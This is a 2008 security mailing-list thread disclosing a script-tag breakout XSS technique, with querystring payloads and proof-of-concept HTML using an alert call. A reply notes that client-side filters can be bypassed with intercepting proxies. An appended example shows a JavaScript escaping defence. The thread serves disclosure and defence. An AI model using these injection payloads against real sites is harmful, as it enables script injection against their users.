
Re: Script Tag Breakout

From: Taufiq Ali <taufiq.ali_at_nospam>
Date: Tue Oct 21 2008 - 05:40:59 GMT
To: Nick Von Dadelszen <nvondad@gmail.com>


Hey Nick,

This is very much there & there are a lot of Greasemonkey (Firefox addon) scripts that do the same. However, if the website uses JavaScript for getting rid of the meta characters then it's poor design, as this can very much be bypassed using application proxies like Paros, WebScarab, Burp Suite etc. So once the script verifies the code, it can then be captured in the above mentioned proxies & manipulated. What you just mentioned will work with websites that use JavaScript to filter out their meta characters.

Taufiq

-------- Original Message --------
Subject: Script Tag Breakout
From: Nick Von Dadelszen <nvondad@gmail.com>
To: webappsec@securityfocus.com
Date: 10/20/2008 7:04 AM

> Hey all,
>
> Not sure if this is a known issue or not but thought I would share.
> It's not a common situation to occur but I've used it a couple of times
> in the last couple of years while testing apps.
>
> -- Description --
> Able to break out of a string variable without using quotes through
> the use of a </script> tag.
>
> For example, if the code of a page does the following:
> <script>
> somestring = "[your querystring here]";
> </script>
>
> You would normally break out of this with the following
> querystring=";[code here]
>
> If the code checks for a double or single quote and removes it, you
> cannot normally break out of this code. However, you are able to
> close the current script tag, even from within a string variable. So,
> the following two breakouts work:
> querystring=</script>[HTML here]
> querystring=</script><script>[javascript here]</script>
>
> The resulting code looks something like the following:
> <html>
> <body>
> <h1>Script Tag Breakout PoC</h1>
> <script>
> string = "</script><h1>Parsed HTML Code Here</h1><!--";
> </script>
> </body>
> </html>
>
> Or:
> <html>
> <body>
> <h1>Script Tag Breakout PoC</h1>
> <script>
> string = "</script><script>alert(document.location);</script>";
> </script>
> </body>
> </html>
>
> In the above HTML, the javascript alert function is called regardless
> of it being contained within a string variable.
>
> -- Tested Browsers --
> All versions of IE and Firefox up to and including IE 7 and Firefox 3.
>
> ---------------------------------------------------------
> Nick von Dadelszen
> Lateral Security
> www.lateralsecurity.com
> ---------------------------------------------------------
>
> -------------------------------------------------------------------------
> Sponsored by: Watchfire
> Methodologies & Tools for Web Application Security Assessment
> With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!
>
> https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
> -------------------------------------------------------------------------
>
>
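As an added example (not code from the thread or from either poster), the following shows why a filter that only removes quotes leaves the `</script>` breakout Nick describes intact, and how an encoder that `\u`-escapes the value keeps `</script` out of the markup entirely; the function names and the parser check are my own.

```javascript
// Added example, not code from the thread. Shows why stripping quotes does
// not stop the </script> breakout, and how to embed an untrusted value in a
// JavaScript string literal so the HTML parser never sees a closing tag.

// Naive filter of the kind the thread discusses: it only drops quotes.
function stripQuotes(value) {
  return String(value).replace(/["']/g, "");
}

// Defensive encoder: every character outside a small safe set is emitted as
// a \uXXXX escape. The JS engine decodes the escape inside the string, while
// the HTML tokenizer only ever sees letters, digits and backslashes, so the
// byte sequence "</script" cannot occur inside the script element.
function escapeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,.\-_]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Builds the inline script from the thread with the value run through filter.
function renderInlineScript(value, filter) {
  return '<script>\nsomestring = "' + filter(value) + '";\n</script>';
}

// Mimics the HTML tokenizer's rule: a <script> element ends at the first
// "</script" (case-insensitive), whatever JavaScript grammar surrounds it.
// Returns true when the script body is cut short by an injected closing tag.
function scriptClosesEarly(html) {
  const lower = html.toLowerCase();
  const open = lower.indexOf("<script>") + "<script>".length;
  const firstClose = lower.indexOf("</script", open);
  const intendedClose = lower.lastIndexOf("</script");
  return firstClose !== -1 && firstClose !== intendedClose;
}

// Recovers the value the JS engine would see. JSON uses the same \uXXXX
// escape rules, so this confirms the encoder is lossless without eval.
function decodeJsString(escaped) {
  return JSON.parse('"' + escaped + '"');
}
```

Run `scriptClosesEarly(renderInlineScript(payload, stripQuotes))` against the PoC payload from the thread and it reports the early close; with `escapeForJsString` it does not, and `decodeJsString` shows the original value still reaches the script unchanged.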